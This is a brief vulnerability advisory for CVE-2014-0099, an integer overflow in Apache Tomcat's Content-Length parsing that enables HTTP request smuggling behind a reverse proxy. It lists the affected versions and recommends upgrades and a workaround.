CVE-2014-0099

Name of the Vulnerable Software and Affected Versions Apache Tomcat versions prior to 6.0.40 Apache Tomcat versions 7.x prior to 7.0.53 Apache Tomcat versions 8.x prior to 8.0.4

Description The issue is related to an integer overflow in the Ascii.java file, which can be exploited when Apache Tomcat is operated behind a reverse proxy. This allows remote attackers to conduct HTTP request smuggling attacks via a crafted Content-Length HTTP header. The vulnerability arises because the code used to parse the request content length header did not check for overflow in the result.

Recommendations For Apache Tomcat versions prior to 6.0.40, update to version 6.0.40 or later. For Apache Tomcat versions 7.x prior to 7.0.53, update to version 7.0.53 or later. For Apache Tomcat versions 8.x prior to 8.0.4, update to version 8.0.4 or later. As a temporary workaround, consider restricting access to the Content-Length header in the HTTP request to minimize the risk of exploitation.